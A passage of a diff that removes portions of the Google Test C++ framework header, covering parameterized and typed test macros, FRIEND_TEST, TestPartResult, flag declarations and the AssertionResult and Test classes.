-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7, const Generator8& g8, const Generator9& g9,
-        const Generator10& g10) {
-  return internal::CartesianProductHolder10<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7, Generator8, Generator9,
-      Generator10>(
-      g1, g2, g3, g4, g5, g6, g7, g8, g9, g10);
-}
-# endif  // GTEST_HAS_COMBINE
-
-
-
-# define TEST_P(test_case_name, test_name) \
-  class GTEST_TEST_CLASS_NAME_(test_case_name, test_name) \
-      : public test_case_name { \
-   public: \
-    GTEST_TEST_CLASS_NAME_(test_case_name, test_name)() {} \
-    virtual void TestBody(); \
-   private: \
-    static int AddToRegistry() { \
-      ::testing::UnitTest::GetInstance()->parameterized_test_registry(). \
-          GetTestCasePatternHolder<test_case_name>(\
-              #test_case_name, __FILE__, __LINE__)->AddTestPattern(\
-                  #test_case_name, \
-                  #test_name, \
-                  new ::testing::internal::TestMetaFactory< \
-                      GTEST_TEST_CLASS_NAME_(test_case_name, test_name)>()); \
-      return 0; \
-    } \
-    static int gtest_registering_dummy_ GTEST_ATTRIBUTE_UNUSED_; \
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(\
-        GTEST_TEST_CLASS_NAME_(test_case_name, test_name)); \
-  }; \
-  int GTEST_TEST_CLASS_NAME_(test_case_name, \
-                             test_name)::gtest_registering_dummy_ = \
-      GTEST_TEST_CLASS_NAME_(test_case_name, test_name)::AddToRegistry(); \
-  void GTEST_TEST_CLASS_NAME_(test_case_name, test_name)::TestBody()
-
-# define INSTANTIATE_TEST_CASE_P(prefix, test_case_name, generator) \
-  ::testing::internal::ParamGenerator<test_case_name::ParamType> \
-      gtest_##prefix##test_case_name##_EvalGenerator_() { return generator; } \
-  int gtest_##prefix##test_case_name##_dummy_ = \
-      ::testing::UnitTest::GetInstance()->parameterized_test_registry(). \
-          GetTestCasePatternHolder<test_case_name>(\
-              #test_case_name, __FILE__, __LINE__)->AddTestCaseInstantiation(\
-                  #prefix, \
-                  &gtest_##prefix##test_case_name##_EvalGenerator_, \
-                  __FILE__, __LINE__)
-
-}  // namespace testing
-
-#endif  // GTEST_HAS_PARAM_TEST
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PARAM_TEST_H_
-// Copyright 2006, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// Google C++ Testing Framework definitions useful in production code.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PROD_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PROD_H_
-
-// When you need to test the private or protected members of a class,
-// use the FRIEND_TEST macro to declare your tests as friends of the
-// class.  For example:
-//
-// class MyClass {
-//  private:
-//   void MyMethod();
-//   FRIEND_TEST(MyClassTest, MyMethod);
-// };
-//
-// class MyClassTest : public testing::Test {
-//   // ...
-// };
-//
-// TEST_F(MyClassTest, MyMethod) {
-//   // Can call MyClass::MyMethod() here.
-// }
-
-#define FRIEND_TEST(test_case_name, test_name)\
-friend class test_case_name##_##test_name##_Test
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PROD_H_
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: mheule@google.com (Markus Heule)
-//
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_TEST_PART_H_
-#define GTEST_INCLUDE_GTEST_GTEST_TEST_PART_H_
-
-#include <iosfwd>
-#include <vector>
-
-namespace testing {
-
-// A copyable object representing the result of a test part (i.e. an
-// assertion or an explicit FAIL(), ADD_FAILURE(), or SUCCESS()).
-//
-// Don't inherit from TestPartResult as its destructor is not virtual.
-class GTEST_API_ TestPartResult {
- public:
-  // The possible outcomes of a test part (i.e. an assertion or an
-  // explicit SUCCEED(), FAIL(), or ADD_FAILURE()).
-  enum Type {
-    kSuccess,          // Succeeded.
-    kNonFatalFailure,  // Failed but the test can continue.
-    kFatalFailure      // Failed and the test should be terminated.
-  };
-
-  // C'tor.  TestPartResult does NOT have a default constructor.
-  // Always use this constructor (with parameters) to create a
-  // TestPartResult object.
-  TestPartResult(Type a_type,
-                 const char* a_file_name,
-                 int a_line_number,
-                 const char* a_message)
-      : type_(a_type),
-        file_name_(a_file_name == NULL ? "" : a_file_name),
-        line_number_(a_line_number),
-        summary_(ExtractSummary(a_message)),
-        message_(a_message) {
-  }
-
-  // Gets the outcome of the test part.
-  Type type() const { return type_; }
-
-  // Gets the name of the source file where the test part took place, or
-  // NULL if it's unknown.
-  const char* file_name() const {
-    return file_name_.empty() ? NULL : file_name_.c_str();
-  }
-
-  // Gets the line in the source file where the test part took place,
-  // or -1 if it's unknown.
-  int line_number() const { return line_number_; }
-
-  // Gets the summary of the failure message.
-  const char* summary() const { return summary_.c_str(); }
-
-  // Gets the message associated with the test part.
-  const char* message() const { return message_.c_str(); }
-
-  // Returns true iff the test part passed.
-  bool passed() const { return type_ == kSuccess; }
-
-  // Returns true iff the test part failed.
-  bool failed() const { return type_ != kSuccess; }
-
-  // Returns true iff the test part non-fatally failed.
-  bool nonfatally_failed() const { return type_ == kNonFatalFailure; }
-
-  // Returns true iff the test part fatally failed.
-  bool fatally_failed() const { return type_ == kFatalFailure; }
-
- private:
-  Type type_;
-
-  // Gets the summary of the failure message by omitting the stack
-  // trace in it.
-  static std::string ExtractSummary(const char* message);
-
-  // The name of the source file where the test part took place, or
-  // "" if the source file is unknown.
-  std::string file_name_;
-  // The line in the source file where the test part took place, or -1
-  // if the line number is unknown.
-  int line_number_;
-  std::string summary_;  // The test failure summary.
-  std::string message_;  // The test failure message.
-};
-
-// Prints a TestPartResult object.
-std::ostream& operator<<(std::ostream& os, const TestPartResult& result);
-
-// An array of TestPartResult objects.
-//
-// Don't inherit from TestPartResultArray as its destructor is not
-// virtual.
-class GTEST_API_ TestPartResultArray {
- public:
-  TestPartResultArray() {}
-
-  // Appends the given TestPartResult to the array.
-  void Append(const TestPartResult& result);
-
-  // Returns the TestPartResult at the given index (0-based).
-  const TestPartResult& GetTestPartResult(int index) const;
-
-  // Returns the number of TestPartResult objects in the array.
-  int size() const;
-
- private:
-  std::vector<TestPartResult> array_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestPartResultArray);
-};
-
-// This interface knows how to report a test part result.
-class TestPartResultReporterInterface {
- public:
-  virtual ~TestPartResultReporterInterface() {}
-
-  virtual void ReportTestPartResult(const TestPartResult& result) = 0;
-};
-
-namespace internal {
-
-// This helper class is used by {ASSERT|EXPECT}_NO_FATAL_FAILURE to check if a
-// statement generates new fatal failures. To do so it registers itself as the
-// current test part result reporter. Besides checking if fatal failures were
-// reported, it only delegates the reporting to the former result reporter.
-// The original result reporter is restored in the destructor.
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-class GTEST_API_ HasNewFatalFailureHelper
-    : public TestPartResultReporterInterface {
- public:
-  HasNewFatalFailureHelper();
-  virtual ~HasNewFatalFailureHelper();
-  virtual void ReportTestPartResult(const TestPartResult& result);
-  bool has_new_fatal_failure() const { return has_new_fatal_failure_; }
- private:
-  bool has_new_fatal_failure_;
-  TestPartResultReporterInterface* original_reporter_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(HasNewFatalFailureHelper);
-};
-
-}  // namespace internal
-
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_TEST_PART_H_
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_TYPED_TEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_TYPED_TEST_H_
-
-// This header implements typed tests and type-parameterized tests.
-
-// Typed (aka type-driven) tests repeat the same test for types in a
-// list.  You must know which types you want to test with when writing
-// typed tests. Here's how you do it:
-
-#if 0
-
-// First, define a fixture class template.  It should be parameterized
-// by a type.  Remember to derive it from testing::Test.
-template <typename T>
-class FooTest : public testing::Test {
- public:
-  ...
-  typedef std::list<T> List;
-  static T shared_;
-  T value_;
-};
-
-// Next, associate a list of types with the test case, which will be
-// repeated for each type in the list.  The typedef is necessary for
-// the macro to parse correctly.
-typedef testing::Types<char, int, unsigned int> MyTypes;
-TYPED_TEST_CASE(FooTest, MyTypes);
-
-// If the type list contains only one type, you can write that type
-// directly without Types<...>:
-//   TYPED_TEST_CASE(FooTest, int);
-
-// Then, use TYPED_TEST() instead of TEST_F() to define as many typed
-// tests for this test case as you want.
-TYPED_TEST(FooTest, DoesBlah) {
-  // Inside a test, refer to TypeParam to get the type parameter.
-  // Since we are inside a derived class template, C++ requires use to
-  // visit the members of FooTest via 'this'.
-  TypeParam n = this->value_;
-
-  // To visit static members of the fixture, add the TestFixture::
-  // prefix.
-  n += TestFixture::shared_;
-
-  // To refer to typedefs in the fixture, add the "typename
-  // TestFixture::" prefix.
-  typename TestFixture::List values;
-  values.push_back(n);
-  ...
-}
-
-TYPED_TEST(FooTest, HasPropertyA) { ... }
-
-#endif  // 0
-
-// Type-parameterized tests are abstract test patterns parameterized
-// by a type.  Compared with typed tests, type-parameterized tests
-// allow you to define the test pattern without knowing what the type
-// parameters are.  The defined pattern can be instantiated with
-// different types any number of times, in any number of translation
-// units.
-//
-// If you are designing an interface or concept, you can define a
-// suite of type-parameterized tests to verify properties that any
-// valid implementation of the interface/concept should have.  Then,
-// each implementation can easily instantiate the test suite to verify
-// that it conforms to the requirements, without having to write
-// similar tests repeatedly.  Here's an example:
-
-#if 0
-
-// First, define a fixture class template.  It should be parameterized
-// by a type.  Remember to derive it from testing::Test.
-template <typename T>
-class FooTest : public testing::Test {
-  ...
-};
-
-// Next, declare that you will define a type-parameterized test case
-// (the _P suffix is for "parameterized" or "pattern", whichever you
-// prefer):
-TYPED_TEST_CASE_P(FooTest);
-
-// Then, use TYPED_TEST_P() to define as many type-parameterized tests
-// for this type-parameterized test case as you want.
-TYPED_TEST_P(FooTest, DoesBlah) {
-  // Inside a test, refer to TypeParam to get the type parameter.
-  TypeParam n = 0;
-  ...
-}
-
-TYPED_TEST_P(FooTest, HasPropertyA) { ... }
-
-// Now the tricky part: you need to register all test patterns before
-// you can instantiate them.  The first argument of the macro is the
-// test case name; the rest are the names of the tests in this test
-// case.
-REGISTER_TYPED_TEST_CASE_P(FooTest,
-                           DoesBlah, HasPropertyA);
-
-// Finally, you are free to instantiate the pattern with the types you
-// want.  If you put the above code in a header file, you can #include
-// it in multiple C++ source files and instantiate it multiple times.
-//
-// To distinguish different instances of the pattern, the first
-// argument to the INSTANTIATE_* macro is a prefix that will be added
-// to the actual test case name.  Remember to pick unique prefixes for
-// different instances.
-typedef testing::Types<char, int, unsigned int> MyTypes;
-INSTANTIATE_TYPED_TEST_CASE_P(My, FooTest, MyTypes);
-
-// If the type list contains only one type, you can write that type
-// directly without Types<...>:
-//   INSTANTIATE_TYPED_TEST_CASE_P(My, FooTest, int);
-
-#endif  // 0
-
-
-// Implements typed tests.
-
-#if GTEST_HAS_TYPED_TEST
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Expands to the name of the typedef for the type parameters of the
-// given test case.
-# define GTEST_TYPE_PARAMS_(TestCaseName) gtest_type_params_##TestCaseName##_
-
-// The 'Types' template argument below must have spaces around it
-// since some compilers may choke on '>>' when passing a template
-// instance (e.g. Types<int>)
-# define TYPED_TEST_CASE(CaseName, Types) \
-  typedef ::testing::internal::TypeList< Types >::type \
-      GTEST_TYPE_PARAMS_(CaseName)
-
-# define TYPED_TEST(CaseName, TestName) \
-  template <typename gtest_TypeParam_> \
-  class GTEST_TEST_CLASS_NAME_(CaseName, TestName) \
-      : public CaseName<gtest_TypeParam_> { \
-   private: \
-    typedef CaseName<gtest_TypeParam_> TestFixture; \
-    typedef gtest_TypeParam_ TypeParam; \
-    virtual void TestBody(); \
-  }; \
-  bool gtest_##CaseName##_##TestName##_registered_ GTEST_ATTRIBUTE_UNUSED_ = \
-      ::testing::internal::TypeParameterizedTest< \
-          CaseName, \
-          ::testing::internal::TemplateSel< \
-              GTEST_TEST_CLASS_NAME_(CaseName, TestName)>, \
-          GTEST_TYPE_PARAMS_(CaseName)>::Register(\
-              "", #CaseName, #TestName, 0); \
-  template <typename gtest_TypeParam_> \
-  void GTEST_TEST_CLASS_NAME_(CaseName, TestName)<gtest_TypeParam_>::TestBody()
-
-#endif  // GTEST_HAS_TYPED_TEST
-
-// Implements type-parameterized tests.
-
-#if GTEST_HAS_TYPED_TEST_P
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Expands to the namespace name that the type-parameterized tests for
-// the given type-parameterized test case are defined in.  The exact
-// name of the namespace is subject to change without notice.
-# define GTEST_CASE_NAMESPACE_(TestCaseName) \
-  gtest_case_##TestCaseName##_
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Expands to the name of the variable used to remember the names of
-// the defined tests in the given test case.
-# define GTEST_TYPED_TEST_CASE_P_STATE_(TestCaseName) \
-  gtest_typed_test_case_p_state_##TestCaseName##_
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE DIRECTLY.
-//
-// Expands to the name of the variable used to remember the names of
-// the registered tests in the given test case.
-# define GTEST_REGISTERED_TEST_NAMES_(TestCaseName) \
-  gtest_registered_test_names_##TestCaseName##_
-
-// The variables defined in the type-parameterized test macros are
-// static as typically these macros are used in a .h file that can be
-// #included in multiple translation units linked together.
-# define TYPED_TEST_CASE_P(CaseName) \
-  static ::testing::internal::TypedTestCasePState \
-      GTEST_TYPED_TEST_CASE_P_STATE_(CaseName)
-
-# define TYPED_TEST_P(CaseName, TestName) \
-  namespace GTEST_CASE_NAMESPACE_(CaseName) { \
-  template <typename gtest_TypeParam_> \
-  class TestName : public CaseName<gtest_TypeParam_> { \
-   private: \
-    typedef CaseName<gtest_TypeParam_> TestFixture; \
-    typedef gtest_TypeParam_ TypeParam; \
-    virtual void TestBody(); \
-  }; \
-  static bool gtest_##TestName##_defined_ GTEST_ATTRIBUTE_UNUSED_ = \
-      GTEST_TYPED_TEST_CASE_P_STATE_(CaseName).AddTestName(\
-          __FILE__, __LINE__, #CaseName, #TestName); \
-  } \
-  template <typename gtest_TypeParam_> \
-  void GTEST_CASE_NAMESPACE_(CaseName)::TestName<gtest_TypeParam_>::TestBody()
-
-# define REGISTER_TYPED_TEST_CASE_P(CaseName, ...) \
-  namespace GTEST_CASE_NAMESPACE_(CaseName) { \
-  typedef ::testing::internal::Templates<__VA_ARGS__>::type gtest_AllTests_; \
-  } \
-  static const char* const GTEST_REGISTERED_TEST_NAMES_(CaseName) = \
-      GTEST_TYPED_TEST_CASE_P_STATE_(CaseName).VerifyRegisteredTestNames(\
-          __FILE__, __LINE__, #__VA_ARGS__)
-
-// The 'Types' template argument below must have spaces around it
-// since some compilers may choke on '>>' when passing a template
-// instance (e.g. Types<int>)
-# define INSTANTIATE_TYPED_TEST_CASE_P(Prefix, CaseName, Types) \
-  bool gtest_##Prefix##_##CaseName GTEST_ATTRIBUTE_UNUSED_ = \
-      ::testing::internal::TypeParameterizedTestCase<CaseName, \
-          GTEST_CASE_NAMESPACE_(CaseName)::gtest_AllTests_, \
-          ::testing::internal::TypeList< Types >::type>::Register(\
-              #Prefix, #CaseName, GTEST_REGISTERED_TEST_NAMES_(CaseName))
-
-#endif  // GTEST_HAS_TYPED_TEST_P
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_TYPED_TEST_H_
-
-// Depending on the platform, different string classes are available.
-// On Linux, in addition to ::std::string, Google also makes use of
-// class ::string, which has the same interface as ::std::string, but
-// has a different implementation.
-//
-// You can define GTEST_HAS_GLOBAL_STRING to 1 to indicate that
-// ::string is available AND is a distinct type to ::std::string, or
-// define it to 0 to indicate otherwise.
-//
-// If ::std::string and ::string are the same class on your platform
-// due to aliasing, you should define GTEST_HAS_GLOBAL_STRING to 0.
-//
-// If you do not define GTEST_HAS_GLOBAL_STRING, it is defined
-// heuristically.
-
-namespace testing {
-
-// Declares the flags.
-
-// This flag temporary enables the disabled tests.
-GTEST_DECLARE_bool_(also_run_disabled_tests);
-
-// This flag brings the debugger on an assertion failure.
-GTEST_DECLARE_bool_(break_on_failure);
-
-// This flag controls whether Google Test catches all test-thrown exceptions
-// and logs them as failures.
-GTEST_DECLARE_bool_(catch_exceptions);
-
-// This flag enables using colors in terminal output. Available values are
-// "yes" to enable colors, "no" (disable colors), or "auto" (the default)
-// to let Google Test decide.
-GTEST_DECLARE_string_(color);
-
-// This flag sets up the filter to select by name using a glob pattern
-// the tests to run. If the filter is not given all tests are executed.
-GTEST_DECLARE_string_(filter);
-
-// This flag causes the Google Test to list tests. None of the tests listed
-// are actually run if the flag is provided.
-GTEST_DECLARE_bool_(list_tests);
-
-// This flag controls whether Google Test emits a detailed XML report to a file
-// in addition to its normal textual output.
-GTEST_DECLARE_string_(output);
-
-// This flags control whether Google Test prints the elapsed time for each
-// test.
-GTEST_DECLARE_bool_(print_time);
-
-// This flag specifies the random number seed.
-GTEST_DECLARE_int32_(random_seed);
-
-// This flag sets how many times the tests are repeated. The default value
-// is 1. If the value is -1 the tests are repeating forever.
-GTEST_DECLARE_int32_(repeat);
-
-// This flag controls whether Google Test includes Google Test internal
-// stack frames in failure stack traces.
-GTEST_DECLARE_bool_(show_internal_stack_frames);
-
-// When this flag is specified, tests' order is randomized on every iteration.
-GTEST_DECLARE_bool_(shuffle);
-
-// This flag specifies the maximum number of stack frames to be
-// printed in a failure message.
-GTEST_DECLARE_int32_(stack_trace_depth);
-
-// When this flag is specified, a failed assertion will throw an
-// exception if exceptions are enabled, or exit the program with a
-// non-zero code otherwise.
-GTEST_DECLARE_bool_(throw_on_failure);
-
-// When this flag is set with a "host:port" string, on supported
-// platforms test results are streamed to the specified port on
-// the specified host machine.
-GTEST_DECLARE_string_(stream_result_to);
-
-// The upper limit for valid stack trace depths.
-const int kMaxStackTraceDepth = 100;
-
-namespace internal {
-
-class AssertHelper;
-class DefaultGlobalTestPartResultReporter;
-class ExecDeathTest;
-class NoExecDeathTest;
-class FinalSuccessChecker;
-class GTestFlagSaver;
-class StreamingListenerTest;
-class TestResultAccessor;
-class TestEventListenersAccessor;
-class TestEventRepeater;
-class UnitTestRecordPropertyTestHelper;
-class WindowsDeathTest;
-class UnitTestImpl* GetUnitTestImpl();
-void ReportFailureInUnknownLocation(TestPartResult::Type result_type,
-                                    const std::string& message);
-
-}  // namespace internal
-
-// The friend relationship of some of these classes is cyclic.
-// If we don't forward declare them the compiler might confuse the classes
-// in friendship clauses with same named classes on the scope.
-class Test;
-class TestCase;
-class TestInfo;
-class UnitTest;
-
-// A class for indicating whether an assertion was successful.  When
-// the assertion wasn't successful, the AssertionResult object
-// remembers a non-empty message that describes how it failed.
-//
-// To create an instance of this class, use one of the factory functions
-// (AssertionSuccess() and AssertionFailure()).
-//
-// This class is useful for two purposes:
-//   1. Defining predicate functions to be used with Boolean test assertions
-//      EXPECT_TRUE/EXPECT_FALSE and their ASSERT_ counterparts
-//   2. Defining predicate-format functions to be
-//      used with predicate assertions (ASSERT_PRED_FORMAT*, etc).
-//
-// For example, if you define IsEven predicate:
-//
-//   testing::AssertionResult IsEven(int n) {
-//     if ((n % 2) == 0)
-//       return testing::AssertionSuccess();
-//     else
-//       return testing::AssertionFailure() << n << " is odd";
-//   }
-//
-// Then the failed expectation EXPECT_TRUE(IsEven(Fib(5)))
-// will print the message
-//
-//   Value of: IsEven(Fib(5))
-//     Actual: false (5 is odd)
-//   Expected: true
-//
-// instead of a more opaque
-//
-//   Value of: IsEven(Fib(5))
-//     Actual: false
-//   Expected: true
-//
-// in case IsEven is a simple Boolean predicate.
-//
-// If you expect your predicate to be reused and want to support informative
-// messages in EXPECT_FALSE and ASSERT_FALSE (negative assertions show up
-// about half as often as positive ones in our tests), supply messages for
-// both success and failure cases:
-//
-//   testing::AssertionResult IsEven(int n) {
-//     if ((n % 2) == 0)
-//       return testing::AssertionSuccess() << n << " is even";
-//     else
-//       return testing::AssertionFailure() << n << " is odd";
-//   }
-//
-// Then a statement EXPECT_FALSE(IsEven(Fib(6))) will print
-//
-//   Value of: IsEven(Fib(6))
-//     Actual: true (8 is even)
-//   Expected: false
-//
-// NB: Predicates that support negative Boolean assertions have reduced
-// performance in positive ones so be careful not to use them in tests
-// that have lots (tens of thousands) of positive Boolean assertions.
-//
-// To use this class with EXPECT_PRED_FORMAT assertions such as:
-//
-//   // Verifies that Foo() returns an even number.
-//   EXPECT_PRED_FORMAT1(IsEven, Foo());
-//
-// you need to define:
-//
-//   testing::AssertionResult IsEven(const char* expr, int n) {
-//     if ((n % 2) == 0)
-//       return testing::AssertionSuccess();
-//     else
-//       return testing::AssertionFailure()
-//         << "Expected: " << expr << " is even\n  Actual: it's " << n;
-//   }
-//
-// If Foo() returns 5, you will see the following message:
-//
-//   Expected: Foo() is even
-//     Actual: it's 5
-//
-class GTEST_API_ AssertionResult {
- public:
-  // Copy constructor.
-  // Used in EXPECT_TRUE/FALSE(assertion_result).
-  AssertionResult(const AssertionResult& other);
-
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4800 /* forcing value to bool */)
-
-  // Used in the EXPECT_TRUE/FALSE(bool_expression).
-  //
-  // T must be contextually convertible to bool.
-  //
-  // The second parameter prevents this overload from being considered if
-  // the argument is implicitly convertible to AssertionResult. In that case
-  // we want AssertionResult's copy constructor to be used.
-  template <typename T>
-  explicit AssertionResult(
-      const T& success,
-      typename internal::EnableIf<
-          !internal::ImplicitlyConvertible<T, AssertionResult>::value>::type*
-          /*enabler*/ = NULL)
-      : success_(success) {}
-
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-  // Assignment operator.
-  AssertionResult& operator=(AssertionResult other) {
-    swap(other);
-    return *this;
-  }
-
-  // Returns true iff the assertion succeeded.
-  operator bool() const { return success_; }  // NOLINT
-
-  // Returns the assertion's negation. Used with EXPECT/ASSERT_FALSE.
-  AssertionResult operator!() const;
-
-  // Returns the text streamed into this AssertionResult. Test assertions
-  // use it when they fail (i.e., the predicate's outcome doesn't match the
-  // assertion's expectation). When nothing has been streamed into the
-  // object, returns an empty string.
-  const char* message() const {
-    return message_.get() != NULL ?  message_->c_str() : "";
-  }
-  // TODO(vladl@google.com): Remove this after making sure no clients use it.
-  // Deprecated; please use message() instead.
-  const char* failure_message() const { return message(); }
-
-  // Streams a custom failure message into this object.
-  template <typename T> AssertionResult& operator<<(const T& value) {
-    AppendMessage(Message() << value);
-    return *this;
-  }
-
-  // Allows streaming basic output manipulators such as endl or flush into
-  // this object.
-  AssertionResult& operator<<(
-      ::std::ostream& (*basic_manipulator)(::std::ostream& stream)) {
-    AppendMessage(Message() << basic_manipulator);
-    return *this;
-  }
-
- private:
-  // Appends the contents of message to message_.
-  void AppendMessage(const Message& a_message) {
-    if (message_.get() == NULL)
-      message_.reset(new ::std::string);
-    message_->append(a_message.GetString().c_str());
-  }
-
-  // Swap the contents of this AssertionResult with other.
-  void swap(AssertionResult& other);
-
-  // Stores result of the assertion predicate.
-  bool success_;
-  // Stores the message describing the condition in case the expectation
-  // construct is not satisfied with the predicate's outcome.
-  // Referenced via a pointer to avoid taking too much stack frame space
-  // with test assertions.
-  internal::scoped_ptr< ::std::string> message_;
-};
-
-// Makes a successful assertion result.
-GTEST_API_ AssertionResult AssertionSuccess();
-
-// Makes a failed assertion result.
-GTEST_API_ AssertionResult AssertionFailure();
-
-// Makes a failed assertion result with the given failure message.
-// Deprecated; use AssertionFailure() << msg.
-GTEST_API_ AssertionResult AssertionFailure(const Message& msg);
-
-// The abstract class that all tests inherit from.
-//
-// In Google Test, a unit test program contains one or many TestCases, and
-// each TestCase contains one or many Tests.
-//
-// When you define a test using the TEST macro, you don't need to
-// explicitly derive from Test - the TEST macro automatically does
-// this for you.
-//
-// The only time you derive from Test is when defining a test fixture
-// to be used a TEST_F.  For example:
-//
-//   class FooTest : public testing::Test {
-//    protected:
-//     void SetUp() override { ... }
-//     void TearDown() override { ... }
-//     ...
-//   };
-//
-//   TEST_F(FooTest, Bar) { ... }
-//   TEST_F(FooTest, Baz) { ... }
-//
-// Test is not copyable.
-class GTEST_API_ Test {
- public:
-  friend class TestInfo;
-
-  // Defines types for pointers to functions that set up and tear down
-  // a test case.
-  typedef internal::SetUpTestCaseFunc SetUpTestCaseFunc;
-  typedef internal::TearDownTestCaseFunc TearDownTestCaseFunc;
-
-  // The d'tor is virtual as we intend to inherit from Test.
-  virtual ~Test();
-
-  // Sets up the stuff shared by all tests in this test case.
-  //
-  // Google Test will call Foo::SetUpTestCase() before running the first
-  // test in test case Foo.  Hence a sub-class can define its own
-  // SetUpTestCase() method to shadow the one defined in the super
-  // class.
-  static void SetUpTestCase() {}
-
-  // Tears down the stuff shared by all tests in this test case.
-  //
-  // Google Test will call Foo::TearDownTestCase() after running the last
-  // test in test case Foo.  Hence a sub-class can define its own
-  // TearDownTestCase() method to shadow the one defined in the super
-  // class.
-  static void TearDownTestCase() {}
-
-  // Returns true iff the current test has a fatal failure.
